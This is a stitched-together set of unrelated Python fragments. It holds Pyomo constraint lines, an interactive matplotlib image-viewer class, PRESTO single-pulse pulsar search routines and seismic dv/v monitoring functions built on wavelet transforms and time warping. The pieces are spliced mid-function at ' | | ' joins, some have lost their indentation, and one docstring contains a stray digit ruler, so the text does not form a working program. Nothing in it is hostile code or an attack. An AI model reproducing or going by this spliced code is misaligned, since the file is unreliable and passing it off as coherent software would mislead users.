m.c1722 = Constraint(expr= m.x335 + m.x343 - m.x351 + m.x367 + m.x375 - m.x383 + m.x399 + m.x407 - m.x415 + m.x431 + m.x439 - m.x447 + m.x463 + m.x471 - m.x479 + m.x495 + m.x503 - m.x511 + m.x527 + m.x535 - m.x543 + m.x559 + m.x567 - m.x575 <= 100)
m.c1723 = Constraint(expr= m.x336 + | |
clim
self.im.append(self.axs[0].imshow(self.data[curr_img], cmap = self.dropdown_cmap.value,
clim = (self.slider_clim.value[0]*0.01*(self.max[curr_img] -
self.min[curr_img]) + self.min[curr_img],
self.slider_clim.value[1]*0.01*(self.max[curr_img] -
self.min[curr_img]) + self.min[curr_img],)))
# if self.compare and self.current_image == 2:
# self.axs[0].imshow(self.error)
# Set correct title
self.axs[0].set_title(self.titles[curr_img])
# Repeat process for histogram
if self.channels[curr_img] in [3, 4]:
self.axs_hist[0].clear()
self.axs_hist[0].axis('off')
self.lines.append(None)
else:
self.axs_hist[0].clear()
self.axs_hist[0].bar(self.bins[curr_img][:-1], self.hist[curr_img],
width = (self.bins[curr_img][1] - self.bins[curr_img][0]) / 1.2)
# Uncomment if condition to show y-axis
# if self.button_show_axis.description == 'Show Axis':
# self.axs_hist[0].axes.yaxis.set_visible(False)
self.axs_hist[0].set_yticks([])
self.axs_hist[0].set_ylabel('Count')
self.axs_hist[0].set_xlabel('Bin')
self.axs_hist[0].set_title(self.titles[curr_img])
if self.max[0] != self.min[0]:
# Assigning this limit is to fully visualize the first bin, otherwise, half of the bin gets lost
self.axs_hist[0].set_xlim(self.min[self.current_image] - 0.01 *(self.max[self.current_image]
- self.min[self.current_image]), self.max[self.current_image])
else:
# If there is only one value in the image, mpl adjusts automatically but throws warning that we want to hide
self.axs_hist[0].set_xlim(self.min[self.current_image] - 0.05, self.min[self.current_image] + 0.05)
self.axs_hist[0].set_ylim(0, 1.1*np.amax(self.hist[curr_img]))
### Block to set lines
xmin = self.slider_clim.value[0]*0.01
xmax = self.slider_clim.value[1]*0.01
# self.lines[0][0].set_xdata([xmin*self.max[self.current_image], xmax*self.max[self.current_image]])
data = [xmin*(self.max[curr_img]-self.min[curr_img])+self.min[curr_img],
xmax*(self.max[curr_img]-self.min[curr_img])+self.min[curr_img]]
self.lines.append(self.axs_hist[0].plot(data, self.axs_hist[0].get_ylim(), 'k', linewidth = '0.3', linestyle = 'dashed'))
# Add colorbar if it existed
if add_cb:
self.set_colorbar(colorbar = True)
# Get the correct x/ylims
if self.data[curr_img].shape == self.data[curr_img - change].shape:
self.axs[0].set_xlim(old_axis[0])
self.axs[0].set_ylim(old_axis[1])
else:
self.xlim[0] = np.array([0 - 0.5, self.image_list[curr_img].shape[1] - 0.5])
self.ylim[0] = np.array([self.image_list[curr_img].shape[0] - 0.5, 0 - 0.5])
# link new axis to callbacks (for zoom) and update stats to new image
self.link_axs()
self.update_stats()
# Manage disabling of buttons (Disable prev if it's the first fig, next if it's the last, else enable both)
if curr_img == self.number_images -1 :
self.button_next.disabled = True
self.button_prev.disabled = False
elif curr_img == 0:
self.button_prev.disabled = True
self.button_next.disabled = False
else:
self.button_next.disabled = False
self.button_prev.disabled = False
# self.fig.tight_layout()
# In case of any transformation to the image, this function will update the information
    def update_histogram(self):
        '''Auxiliary function to update the histograms.

        This function is called by `__init__`, `change_image`, `x_w_callback`
        and any function that modifies the current display. It ensures
        that the histogram in display matches the image.
        '''
        # Initialize arrays to hold hist and bins
        self.hist = []
        self.bins = []
        # Iterate through each image and compute its histogram
        count = 0
        for i in range(self.number_images):
            hist, bins = np.histogram(self.data[count], bins = 70, range = (self.min[count], self.max[count]))
            # Append info to our bins and hist attributes
            self.bins.append(bins)
            self.hist.append(hist)
            count += 1
        # Attribute to store the clim marker lines drawn on each histogram
        self.lines = []
        # Now, we iterate through the hist axes and show the histogram, according to the use case.
        count = 0
        for i in range(self.number_images):
            # The first conditional is equal to the conditional when activating axis for the images
            # print(i, len(self.axs), self.number_images - 1)
            if i == len(self.axs) or i == self.number_images - 1:
                if len(self.axs) < len(self.data):
                    break
                else:
                    # Blank out any spare histogram axes beyond the data.
                    for j in range(i + 1, len(self.axs)):
                        self.axs_hist[j].axis('off')
            # Display axes, only with the x-axis visible, and with corresponding title
            # NOTE(review): prefer "is not None" over "!= None".
            if self.current_image != None:
                count = self.current_image
            if self.channels[i] in [3, 4]:
                # RGB(A) images get no histogram panel.
                self.axs_hist[i].clear()
                self.axs_hist[i].axis('off')
                # We add this element to make the line consistent with the histograms
                self.lines.append(None)
            else:
                self.axs_hist[i].clear()
                if self.max[count] != self.min[count]:
                    # Assigning this limit is to fully visualize the first bin, otherwise, half of the bin gets lost
                    self.axs_hist[i].set_xlim(self.min[count] - 0.01 *(self.max[count] - self.min[count]), self.max[count])
                else:
                    # If there is only one value in the image, mpl adjusts automatically but throws warning that we want to hide
                    self.axs_hist[i].set_xlim(self.min[count] - 0.05, self.min[count] + 0.05)
                self.axs_hist[i].set_ylim(0, 1.1*np.amax(self.hist[count]) + 0.05)
                self.axs_hist[i].bar(self.bins[count][:-1], self.hist[count], width = (self.bins[count][1] - self.bins[count][0]) / 1.2)
                self.lines.append(self.axs_hist[i].plot(self.axs_hist[i].get_xlim(), self.axs_hist[i].get_ylim(), 'k', linewidth = '0.3', linestyle = 'dashed'))
                # Hide only y-axis ticks by default
                # self.axs_hist[i].axes.yaxis.set_visible(False)
                self.axs_hist[i].set_yticks([])
                self.axs_hist[i].set_title(self.titles[count])
                self.axs_hist[i].set_ylabel('Count')
                self.axs_hist[i].set_xlabel('Bin')
            count +=1
        self.fig_hist.tight_layout()
        # self.update_hist_lines()
# Function that links all existing Axes to the Matplotlib callbacks, to act whenever axis limits change (e.i., when there is a zoom)
    def link_axs(self):
        '''Connect every Axes to limit-change callbacks and store new limits.

        Called when an image changes, when there is a zoom event, or any
        event that changes the axis. If *Joint Zoom* is enabled, the new
        limits are copied to every image; otherwise only the Axes that
        changed is updated. Statistics are refreshed afterwards so they
        reflect the region currently in display.
        '''
        def on_xlims_change(event_ax):
            # Iterate through all the images
            for i in range(self.number_images):
                # In the case of single_image == True, stop at the first
                if len(self.axs) == 1:
                    # Update xlim attribute
                    self.xlim[i] = np.round(event_ax.get_xlim(),1)
                    break
                # Check if joint zoom is on
                if self.button_joint_zoom.description == 'Disable Joint Zoom':
                    self.xlim[i] = np.round(event_ax.get_xlim(),1)
                # Else look for the Axes which had the changes
                elif event_ax == self.axs[i]:
                    # Once found, update xlimits
                    self.xlim[i] = np.round(event_ax.get_xlim(),1)
            self.update_stats()
        def on_ylims_change(event_ax):
            # Mirror of on_xlims_change for the y limits.
            for i in range(self.number_images):
                if len(self.axs) == 1:
                    self.ylim[i] = np.round(event_ax.get_ylim(),1)
                    break
                if self.button_joint_zoom.description == 'Disable Joint Zoom':
                    self.ylim[i] = np.round(event_ax.get_ylim(),1)
                elif event_ax == self.axs[i]:
                    self.ylim[i] = np.round(event_ax.get_ylim(),1)
            self.update_stats()
        count = 0
        # Connect all Axes to the same handler (The handler we just defined takes care of identifying the Axes that changed)
        for ax in self.axs:
            if self.number_images == count:
                break
            ax.set_xlim(self.xlim[count])
            ax.set_ylim(self.ylim[count])
            ax.callbacks.connect('xlim_changed', on_xlims_change)
            ax.callbacks.connect('ylim_changed', on_ylims_change)
            count += 1
##########################################################
################# Utility Functions ######################
##########################################################
def get_histogram(self):
#Return histogram information, bins, hist and axes in list form
return(self.bins, self.hist)
def show_histogram(self, hist = False):
if hist:
self.out_fig.layout.width = '45%'
# self.hist_container = widgets.Output()
# self.final_view_hist = widgets.HBox([self.out_fig, self.hist_container, self.out]) #H layout
# # self.final_view_hist = widgets.VBox([self.final_view_no_hist, self.hist_container]) # V layout
# display(self.final_view_hist)
with self.hist_container:
display(self.out_hist) # self.out_hist
else:
self.hist_container.clear_output()
self.out_fig.layout.width = '80%'
def set_widgets(self, widgets = True):
if widgets:
self.widgets = True
else:
self.widgets = False
self.out.clear_output()
self.button_showw.close()
self.update_view()
def set_axis(self, axis=False):
    """Show (axis=True) or hide (axis=False) the x/y axes of every displayed image.

    Only the first ``len(self.data)`` Axes are touched, since the subplot
    grid may contain more Axes than there are images.
    """
    for ax in self.axs[:len(self.data)]:
        ax.axes.yaxis.set_visible(axis)
        ax.axes.xaxis.set_visible(axis)
    # NOTE: the same treatment can be extended to the histogram Axes
    # (self.axs_hist) by iterating them here and hiding their y-axis.
def set_colorbar(self, colorbar = True):
    """Add (colorbar=True) or remove (colorbar=False) one colorbar per displayed image."""
    if colorbar:
        # Redefine attribute holding colorbars. Make sure we have an empty list to append our colorbars
        self.cb = []
    # Iterate through every AxesImage
    count = 0
    for ax in self.axs:
        # check that we have images left to plot (in case subplots = [m, n], where m*m > num_images), if not, break
        if count == len(self.data):
            break
        if colorbar:
            # If colorbar was requested, if so, show it
            self.cb.append(self.fig.colorbar(self.im[count], ax = ax))
        else:
            # If colorbar = False, check if there is an existing colorbar. If so, remove it.
            if count < len(self.cb):
                self.cb[count].remove()
        count += 1
    # Now that we have removed the colorbars, empty the list, to get it ready for another call
    if not(colorbar):
        self.cb = []
    # Call plt.draw to show colorbars
    plt.draw()
def set_colormap(self, colormap='gray'):
    """Apply *colormap* to every displayed image and sync the dropdown widget."""
    # Keep the UI dropdown in sync when this is called programmatically.
    self.dropdown_cmap.value = colormap
    for image in self.im:
        image.set_cmap(cmap=colormap)
def get_statistics(self, images = None):
'''Function to get extensive statistics about the displayed images
0123456789112345678921234567893123456789412345678951234567896123456789712345 67898123456789
Function that iterates through all the images in display, and gets
information ony about the current region in display. It firsts
extracts the region, and calculates the mean and standard deviation,
minimum and maximum values, shape, and display limits. It returns
this information in list form, plus a descriptive string used to
display the information in the viewer.
'''
# Initialize | |
import bisect, os, sys, getopt, infodata, glob
import scipy, scipy.signal, ppgplot, scipy.special
import numpy as Num
from presto import rfft
from psr_utils import coord_to_string
from optparse import OptionParser
from Pgplot import *
import pulsarutil as plsr
import numpy.ma as ma
class candidate:
    """A single-pulse candidate event from one de-dispersed time series.

    Python 2 style class: ordering is provided via __cmp__ (ignored by
    Python 3), matching the .singlepulse file row format in __str__.
    """
    def __init__(self, DM, sigma, time, bin, downfact, block, sig, mean):
        self.DM = DM                # dispersion measure of the trial
        self.sigma = sigma          # detection significance (SNR)
        self.time = time            # event time in seconds
        self.bin = bin              # event sample number in the time series
        self.downfact = downfact    # boxcar width (in bins) that detected it
        self.block = block          # data block index the event belongs to
        self.sig = sig              # presumably the local std of the block — TODO confirm
        self.mean = mean            # presumably the local mean of the block — TODO confirm
    def __str__(self):
        # Fixed-width row as written to .singlepulse files
        return "%7.2f %7.2f %13.6f %10d %3d %3d %3.2f %5.2f\n"%\
            (self.DM, self.sigma, self.time, self.bin, self.downfact, \
             self.block, self.sig, self.mean)
    def __cmp__(self, other):
        # Sort by time (i.e. bin) by default
        return cmp(self.bin, other.bin)
class clust_cand:
    """A clustered single-pulse candidate (a group of related events).

    Python 2 style class: ordering is provided via __cmp__ (ignored by
    Python 3).  Holds both the peak event of the cluster and the
    mean/centre statistics over all its samples.
    """
    def __init__(self, DM, sigma_max, time_max, bin_max, nsamp, block, sig, mean, \
                 sigma_mean, time_mean, bin_mean, time_ctr, bin_ctr, wtot):
        self.DM = DM                  # dispersion measure of the trial
        self.sigma = sigma_max        # peak significance within the cluster
        self.time = time_max          # time of the peak sample
        self.bin = bin_max            # bin of the peak sample
        self.nsamp= nsamp             # number of samples in the cluster
        self.block = block            # data block index
        self.sig = sig                # presumably local std of the block — TODO confirm
        self.mean = mean              # presumably local mean of the block — TODO confirm
        self.sigma_mean = sigma_mean  # mean significance over the cluster
        self.time_mean = time_mean    # mean time over the cluster
        self.bin_mean = bin_mean      # mean bin over the cluster
        self.time_ctr = time_ctr      # cluster centre time
        self.bin_ctr = bin_ctr        # cluster centre bin
        self.wtot = wtot              # total cluster width in bins
    def __str__(self):
        # NOTE: the row leads with the mean/centre statistics
        # (sigma_mean, time_ctr, bin_ctr, wtot), then the peak values.
        return "%7.2f %7.2f %13.6f %10d %3d %3d %3.2f %5.2f %7.2f %13.6f %10d %13.6f %10d %5d\n"%\
            (self.DM, self.sigma_mean, self.time_ctr, self.bin_ctr, self.wtot, \
             self.block, self.sig, self.mean,
             self.sigma, self.time, self.bin, \
             self.time_mean, self.bin_mean, self.nsamp)
    def __cmp__(self, other):
        # Sort by time (i.e. bin) by default
        return cmp(self.bin, other.bin)
def cmp_sigma(self, other):
    """Comparison helper that orders candidates by *decreasing* significance."""
    # Negate the natural ordering so the most significant sorts first.
    return -cmp(self.sigma, other.sigma)
def fft_convolve(fftd_data, fftd_kern, lo, hi):
    """
    fft_convolve(fftd_data, fftd_kern, lo, hi):
        Perform a convolution with the complex floating point vectors
            'fftd_data' and 'fftd_kern'.  The returned vector will start at
            at bin 'lo' (must be an integer), and go up to but not
            include bin 'hi' (also an integer).
    """
    # Note: The initial FFTs should be done like:
    # fftd_kern = rfft(kernel, -1)
    # fftd_data = rfft(data, -1)
    prod = Num.multiply(fftd_data, fftd_kern)
    # Element 0 is handled separately: presto's rfft presumably packs the
    # DC term in .real[0] and the Nyquist term in .imag[0] (both purely
    # real), so they must be multiplied component-wise rather than as one
    # complex product — TODO confirm against presto's rfft docs.
    prod.real[0] = fftd_kern.real[0] * fftd_data.real[0]
    prod.imag[0] = fftd_kern.imag[0] * fftd_data.imag[0]
    # Inverse transform (sign +1) and keep only the requested bin range.
    return rfft(prod, 1)[lo:hi].astype(Num.float32)
def make_fftd_kerns(downfacts, fftlen):
    """
    Pre-compute FFT'd, RMS-normalized boxcar kernels of width 'downfact'
    bins for each entry of 'downfacts', each padded to 'fftlen' samples.

    Returns a list of FFT'd kernels suitable for fft_convolve().
    """
    fftd_kerns = []
    for downfact in downfacts:
        kern = Num.zeros(fftlen, dtype=Num.float32)
        # These offsets produce kernels that give results
        # equal to scipy.signal.convolve.
        # NOTE: '//' (floor division) keeps the original Python 2
        # integer-division semantics and avoids float indices on Python 3.
        if downfact % 2:  # Odd number
            kern[:downfact//2+1] += 1.0
            kern[-(downfact//2):] += 1.0
        else:  # Even number
            kern[:downfact//2+1] += 1.0
            if (downfact > 2):
                kern[-(downfact//2-1):] += 1.0
        # Dividing by sqrt(downfact) preserves the RMS=1
        # characteristic of the data after convolution.
        fftd_kerns.append(rfft(kern / Num.sqrt(downfact), -1))
    return fftd_kerns
def prune_related1(hibins, hivals, downfact):
    """
    Remove candidates that are within half a boxcar width of a more
    significant candidate.

    Works in place on the raw candidate arrays (bins must be sorted
    ascending) and uses the single 'downfact' they were selected with.

    Parameters:
        hibins   -- list of candidate bin numbers, sorted ascending
        hivals   -- matching list of candidate significances
        downfact -- boxcar width (in bins) used in the search

    Returns the pruned (hibins, hivals) pair.
    """
    toremove = set()
    for ii in range(0, len(hibins)-1):
        if ii in toremove: continue
        xbin, xsigma = hibins[ii], hivals[ii]
        for jj in range(ii+1, len(hibins)):
            ybin, ysigma = hibins[jj], hivals[jj]
            # Bins are sorted, so once we are more than half a boxcar
            # away no later candidate can be related either.
            # NOTE: '//' keeps the original Python 2 integer-division
            # threshold (e.g. 3//2 == 1, not 1.5) on Python 3.
            if (abs(ybin-xbin) > downfact//2):
                break
            else:
                if jj in toremove:
                    continue
                # Keep the more significant member of the close pair.
                if (xsigma > ysigma):
                    toremove.add(jj)
                else:
                    toremove.add(ii)
    # Now zap them starting from the end so earlier indices stay valid
    toremove = sorted(toremove, reverse=True)
    for bin in toremove:
        del(hibins[bin])
        del(hivals[bin])
    return hibins, hivals
def prune_related2(dm_candlist, downfacts):
    """
    Remove candidates that are close to a more significant candidate.

    Works on candidate instances (anything exposing .bin, .sigma and
    .downfact), sorted by bin, and accounts for the possibly different
    downfacts of the two candidates being compared.

    Parameters:
        dm_candlist -- list of candidates, sorted by bin (modified in place)
        downfacts   -- list of all boxcar widths used in the search

    Returns the pruned list.
    """
    toremove = set()
    for ii in range(0, len(dm_candlist)-1):
        if ii in toremove: continue
        xx = dm_candlist[ii]
        xbin, xsigma = xx.bin, xx.sigma
        for jj in range(ii+1, len(dm_candlist)):
            yy = dm_candlist[jj]
            ybin, ysigma = yy.bin, yy.sigma
            # Sorted bins: beyond half the widest boxcar nothing later
            # can be related.  '//' keeps Python 2 integer semantics.
            if (abs(ybin-xbin) > max(downfacts)//2):
                break
            else:
                if jj in toremove:
                    continue
                # Proximity limit from the wider of the two boxcars.
                # prox = max([xx.downfact//2+yy.downfact//2, 1])
                prox = max([xx.downfact//2, yy.downfact//2, 1])
                if (abs(ybin-xbin) <= prox):
                    # Keep the more significant candidate of the pair.
                    if (xsigma > ysigma):
                        toremove.add(jj)
                    else:
                        toremove.add(ii)
    # Now zap them starting from the end so earlier indices stay valid
    toremove = sorted(toremove, reverse=True)
    for bin in toremove:
        del(dm_candlist[bin])
    return dm_candlist
def prune_related3(ts, overthr, nbin=2):
    '''Cluster algorithm used in place of prune_related1 for efficiency (LGS).

    Groups consecutive above-threshold samples (gaps <= nbin bins belong to
    the same cluster) and keeps only the peak of each cluster.

    Inputs:
       ts      = time series (numpy array)
       overthr = indices of samples in ts that are over threshold (sorted)
       nbin    = maximum allowed difference in bins (default 2)
    Output:
       2 x nclusters array: row 0 = peak sample index, row 1 = peak amplitude.
       (If overthr is empty, (ts, overthr) is returned unchanged, matching
       the historical behavior callers rely on.)
    '''
    # If overthr is an empty list, just give the inputs back
    if len(overthr) == 0: return ts, overthr
    # Num.cast was removed in NumPy 2.0; asarray(..., dtype=int) is the
    # equivalent, version-proof conversion.
    overthr = Num.asarray(overthr, dtype=int)
    # Define clusters: indices where the gap to the next event exceeds nbin
    cl_end = Num.where(overthr[1:]-overthr[:-1] > nbin)[0]
    # Append last index to include trailing events
    cl_end = Num.append(cl_end, len(overthr)-1)
    p = 0
    params = Num.zeros((len(cl_end), 2))
    # Loop through clusters and record each cluster's peak
    for i in range(len(cl_end)):
        # Events belonging to this cluster
        ot = overthr[p:cl_end[i]+1]
        clust = ts[ot]
        smax = overthr[p] + clust.argmax()
        amax = Num.max(clust)
        # Bug fix: was "params[i:] = smax, amax", which re-assigned every
        # trailing row on each iteration (accidentally O(n^2)); only row i
        # should be written.
        params[i] = smax, amax
        p = cl_end[i] + 1
    return params.transpose()
def prune_border_cases(dm_candlist, offregions):
    """
    Remove candidates whose boxcar half-width overlaps a boundary
    between real data and padding.

    Parameters:
        dm_candlist -- candidates (with .bin and .downfact), sorted by bin
        offregions  -- list of (off, on) padding intervals, sorted by position

    Returns the pruned list (also modified in place).
    """
    #print offregions
    toremove = set()
    # Walk from the highest-bin candidate backwards.
    for ii in range(len(dm_candlist))[::-1]:
        cand = dm_candlist[ii]
        # Integer half-width on each side ('//' keeps the original
        # Python 2 integer-division semantics on Python 3).
        loside = cand.bin-cand.downfact//2
        hiside = cand.bin+cand.downfact//2
        # Sorted bins: once fully below the first padding region,
        # no earlier candidate can overlap one either.
        if hiside < offregions[0][0]: break
        for off, on in offregions:
            if (hiside > off and loside < on):
                toremove.add(ii)
    # Now zap them starting from the end so earlier indices stay valid
    toremove = sorted(toremove, reverse=True)
    for ii in toremove:
        del(dm_candlist[ii])
    return dm_candlist
# Help text shown by the command-line interface.
# Fix: user-facing typo "occuring" -> "occurring" (twice).
full_usage = """
usage: single_pulse_search.py [options] .dat files _or_ .singlepulse files
[-h, --help] : Display this help
[-m, --maxwidth] : Set the max downsampling in sec (see below for default)
[-p, --noplot] : Look for pulses but do not generate a plot
[-t, --threshold] : Set a different threshold SNR (default=5.0)
[-x, --xwin] : Don't make a postscript plot, just use an X-window
[-s, --start] : Only plot events occurring after this time (s)
[-e, --end] : Only plot events occurring before this time (s)
[-g, --glob] : Use the files from these glob expressions (in quotes)
[-f, --fast] : Use a less-accurate but much faster method of detrending
Perform a single-pulse search (or simply re-plot the results of a
single-pulse search) on a set of de-dispersed time series (.dat
files).
The search attempts to find pulses by matched-filtering the data
with a series of different width boxcar functions. The possible
boxcar sizes are [1, 2, 3, 4, 6, 9, 14, 20, 30, 45, 70, 100, 150]
bins. By default the boxcars <= 30 are used. You can specify
that the larger boxcars are used with the -m (or --maxwidth) option.
The matched filtering (and accounting for all the possible 'phase'
offsets of each boxcar) is accomplished by convolving the boxcars
with the full resolution data. 'Duplicate' candidates from this
process are filtered, leaving only the most significant. The time
series are initially smoothed using a piecewise linear fit to the
data where each piece is 2000 data points long.
If the input files are .singlepulse files, we won't actually perform
a search, we'll only read in the output .singlepulse files and make
a plot using the information they contain (along with the
corresponding .inf files).
Copyright <NAME> <<EMAIL>>, 2005
"""
# Short usage line handed to OptionParser.
usage = "usage: %prog [options] .dat files _or_ .singlepulse files"
def read_singlepulse_files(infiles, threshold, T_start, T_end):
    """
    Read .singlepulse/.cluster files and collect candidates above threshold.

    Parameters:
        infiles   -- list of .singlepulse/.cluster file names
        threshold -- minimum significance (sigma) to keep a candidate
        T_start   -- ignore events before this time (s)
        T_end     -- ignore events after this time (s)

    Returns (info0, DMs, candlist, num_v_DMstr):
        info0       -- infodata for the first file (None if infiles is empty)
        DMs         -- sorted list of trial DMs
        candlist    -- kept candidate/clust_cand instances
        num_v_DMstr -- dict mapping "%.2f" DM string -> number of candidates
    """
    DMs = []
    candlist = []
    num_v_DMstr = {}
    info0 = None  # robustness: defined even when infiles is empty
    for ii, infile in enumerate(infiles):
        # Derive the base name the matching .inf file shares.
        if infile.endswith(".singlepulse"):
            filenmbase = infile[:infile.rfind(".singlepulse")]
        elif infile.endswith(".cluster"):
            filenmbase = infile[:infile.rfind(".cluster")]
        else:
            filenmbase = infile
        info = infodata.infodata(filenmbase+".inf")
        DMstr = "%.2f"%info.DM
        DMs.append(info.DM)
        num_v_DMstr[DMstr] = 0
        if ii==0:
            info0 = info
        # Skip empty files (os.stat()[6] is the size in bytes).
        if os.stat(infile)[6]:
            try:
                cands = Num.loadtxt(infile)
                # A single candidate loads as 1-D; promote it to 2-D.
                if len(cands.shape)==1:
                    cands = Num.asarray([cands])
                for cand in cands:
                    # Rows are time-sorted, so we may break past T_end.
                    if cand[2] < T_start: continue
                    if cand[2] > T_end: break
                    if cand[1] >= threshold:
                        if infile.endswith(".cluster"): candlist.append(clust_cand(*cand))
                        else: candlist.append(candidate(*cand))
                        num_v_DMstr[DMstr] += 1
            except Exception:
                # Bug fix: was "except:" followed by the bare expression
                # "IndexError", a no-op that silently swallowed every error.
                # Keep the intended behavior (treat unparsable/empty files
                # as having no candidates) but make it explicit.
                pass
    DMs.sort()
    return info0, DMs, candlist, num_v_DMstr
def clean_timeseries(ts, clust_len=4, nabove=10.0, debug=False):
'''Attempts to clean a time series to get reliable
calculation of mean and std.
It applies a threshold and looks for greater than
length clust_len and takes out a region surrounding it
Inputs:
ts = time series
thr = SNR multiplier for threshold
clust_len = the minimum length assumed for a cluster
debug = will additionally return masked time series
Outputs:
tmean = cleaned mean of time series
tsig = cleaned standard deviation of time series
'''
nloops=0
#Copy time series array and make it a masked array
tstmp=Num.copy(ts)
| |
np.max(freq)
itvec = np.arange(np.int((tmin-t.min())/dt)+1, np.int((tmax-t.min())/dt)+1)
tvec = t[itvec]
# apply cwt on two traces
cwt1, sj, freq, coi, _, _ = pycwt.cwt(cur, dt, dj, s0, J, wvn)
cwt2, sj, freq, coi, _, _ = pycwt.cwt(ref, dt, dj, s0, J, wvn)
# extract real values of cwt
rcwt1, rcwt2 = np.real(cwt1), np.real(cwt2)
# zero out data outside frequency band
if (fmax> np.max(freq)) | (fmax <= fmin):
raise ValueError('Abort: input frequency out of limits!')
else:
freq_indin = np.where((freq >= fmin) & (freq <= fmax))[0]
# convert wavelet domain back to time domain (~filtering)
if not allfreq:
# inverse cwt to time domain
icwt1 = pycwt.icwt(cwt1[freq_indin], sj[freq_indin], dt, dj, wvn)
icwt2 = pycwt.icwt(cwt2[freq_indin], sj[freq_indin], dt, dj, wvn)
# assume all time window is used
wcwt1, wcwt2 = np.real(icwt1), np.real(icwt2)
# Normalizes both signals, if appropriate.
if normalize:
ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
else:
ncwt1 = wcwt1
ncwt2 = wcwt2
# run stretching
dvv, err, cc, cdp = ts_dvv(ncwt2[itvec], ncwt1[itvec], dv_range, nbtrial, para)
return dvv, err
# directly take advantage of the real-valued parts of wavelet transforms
else:
# initialize variable
nfreq=len(freq_indin)
dvv, cc, cdp, err = np.zeros(nfreq,dtype=np.float32), np.zeros(nfreq,dtype=np.float32),\
np.zeros(nfreq,dtype=np.float32),np.zeros(nfreq,dtype=np.float32)
# loop through each freq
for ii, ifreq in enumerate(freq_indin):
# prepare windowed data
wcwt1, wcwt2 = rcwt1[ifreq], rcwt2[ifreq]
# Normalizes both signals, if appropriate.
if normalize:
ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
else:
ncwt1 = wcwt1
ncwt2 = wcwt2
# run stretching
dv, error, c1, c2 = ts_dvv(ncwt2[itvec], ncwt1[itvec], dv_range, nbtrial, para)
dvv[ii], cc[ii], cdp[ii], err[ii]=dv, c1, c2, error
return freq[freq_indin], dvv, err
def wtdtw_dvv(ref,cur,allfreq,para,maxLag,b,direction,dj=1/12,s0=-1,J=-1,wvn='morlet',normalize=True):
    """
    Apply dynamic time warping method to continuous wavelet transformation (CWT) of signals
    for all frequencies in an interest range
    Parameters
    --------------
    ref: The "Reference" timeseries (numpy.ndarray)
    cur: The "Current" timeseries (numpy.ndarray)
    allfreq: a boolean variable to make measurements on all frequency range or not
    para: dict with 't' (time vector), 'twin' (time window), 'freq' (freq limits) and 'dt'
    maxLag: max number of points to search forward and backward.
    b: b-value to limit strain, which is to limit the maximum velocity perturbation. See equation 11 in (Mikesell et al. 2015)
    direction: direction to accumulate errors (1=forward, -1=backward)
    dj, s0, J, sig, wvn: common parameters used in 'wavelet.wct'
    normalize: normalize the wavelet spectrum or not. Default is True
    RETURNS:
    ------------------
    dvv: estimated dv/v (per-frequency array when allfreq is True)
    err: error of dv/v estimation
    Written by <NAME> (30 Jun, 2019)
    """
    # common variables
    t = para['t']
    twin = para['twin']
    freq = para['freq']
    dt = para['dt']
    tmin = np.min(twin)
    tmax = np.max(twin)
    fmin = np.min(freq)
    fmax = np.max(freq)
    # sample indices covering the requested time window
    # NOTE(review): np.int was removed in NumPy >= 1.24 — this assumes an older NumPy
    itvec = np.arange(np.int((tmin-t.min())/dt)+1, np.int((tmax-t.min())/dt)+1)
    tvec = t[itvec]
    # apply cwt on two traces
    cwt1, sj, freq, coi, _, _ = pycwt.cwt(cur, dt, dj, s0, J, wvn)
    cwt2, sj, freq, coi, _, _ = pycwt.cwt(ref, dt, dj, s0, J, wvn)
    # extract real values of cwt
    rcwt1, rcwt2 = np.real(cwt1), np.real(cwt2)
    # zero out cone of influence and data outside frequency band
    if (fmax> np.max(freq)) | (fmax <= fmin):
        raise ValueError('Abort: input frequency out of limits!')
    else:
        freq_indin = np.where((freq >= fmin) & (freq <= fmax))[0]
    # convert wavelet domain back to time domain (~filtering)
    if not allfreq:
        # inverse cwt to time domain (band-limited reconstruction)
        icwt1 = pycwt.icwt(cwt1[freq_indin], sj[freq_indin], dt, dj, wvn)
        icwt2 = pycwt.icwt(cwt2[freq_indin], sj[freq_indin], dt, dj, wvn)
        # assume all time window is used
        wcwt1, wcwt2 = np.real(icwt1), np.real(icwt2)
        # Normalizes both signals, if appropriate.
        if normalize:
            ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
            ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
        else:
            ncwt1 = wcwt1
            ncwt2 = wcwt2
        # run dtw on the windowed, filtered traces
        dv, error, dist = dtw_dvv(ncwt2[itvec], ncwt1[itvec], para, maxLag, b, direction)
        dvv, err = dv, error
        return dvv, err
    # directly take advantage of the real-valued parts of wavelet transforms
    else:
        # initialize variable
        nfreq=len(freq_indin)
        # NOTE(review): cc and cdp are allocated but never filled in this branch
        dvv, cc, cdp, err = np.zeros(nfreq,dtype=np.float32), np.zeros(nfreq,dtype=np.float32),\
            np.zeros(nfreq,dtype=np.float32),np.zeros(nfreq,dtype=np.float32)
        # loop through each freq
        for ii, ifreq in enumerate(freq_indin):
            # prepare windowed data
            wcwt1, wcwt2 = rcwt1[ifreq], rcwt2[ifreq]
            # Normalizes both signals, if appropriate.
            if normalize:
                ncwt1 = (wcwt1 - wcwt1.mean()) / wcwt1.std()
                ncwt2 = (wcwt2 - wcwt2.mean()) / wcwt2.std()
            else:
                ncwt1 = wcwt1
                ncwt2 = wcwt2
            # run dtw at this single frequency
            dv, error, dist = dtw_dvv(ncwt2[itvec], ncwt1[itvec], para, maxLag, b, direction)
            dvv[ii], err[ii] = dv, error
        return freq[freq_indin], dvv, err
#############################################################
################ MONITORING UTILITY FUNCTIONS ###############
#############################################################
'''
Below are the monitoring utility functions called by the monitoring functions above.
'''
def smooth(x, window='boxcar', half_win=3):
    """
    Smooth a time series with a sliding window.

    Parameters
    --------------
    x: timeseries data (1-D array; may be complex)
    window: type of window ("boxcar" for a moving average, anything else
            selects a Hann window)
    half_win: half window length (full window is 2*half_win + 1 samples)

    RETURNS:
    ------------------
    y: smoothed series, same length as x (complex dtype)
    """
    window_len = 2 * half_win + 1
    # Mirror-extend the data at both ends so the window can be
    # applied right up to the borders without shrinking the output.
    s = np.r_[x[window_len - 1:0:-1], x, x[-1:-window_len:-1]]
    # Fix: scipy.signal.boxcar/hanning were removed in SciPy >= 1.13;
    # the equivalent windows live in scipy.signal.windows
    # (windows.hann == the old hanning).
    if window == "boxcar":
        w = scipy.signal.windows.boxcar(window_len).astype('complex')
    else:
